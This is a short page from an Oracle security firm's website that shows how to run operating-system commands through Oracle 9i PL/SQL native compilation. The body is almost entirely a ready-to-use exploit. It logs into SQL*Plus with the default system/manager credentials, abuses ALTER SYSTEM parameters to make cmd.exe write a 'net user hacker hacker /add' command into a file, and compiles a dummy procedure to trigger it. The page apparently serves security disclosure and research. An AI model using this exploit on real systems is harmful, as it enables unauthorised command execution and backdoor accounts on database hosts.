Deutsch Download free trial version of Repscan from Sentrigo

Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security

Run OS commands via PL/SQL Native (9i)

Idea (several years ago) by Alexander Kornbrust (undocumented but known since a while)

Requirements
  • ALTER SYSTEM

Code:

sqlplus system/manager
SQL> alter system set plsql_native_library_dir='C:\';
SQL> alter system set plsql_native_make_file_name='makefile';
SQL> alter session set plsql_compiler_flags='NATIVE';

SQL> alter system set plsql_native_make_utility='cmd.exe /c echo net user hacker hacker /add >> c:\open.cmd &';

SQL> Create or replace procedure h1 as begin
null;
end;
/



© 2009 by Red-Database-Security GmbH - last update 20-apr-2009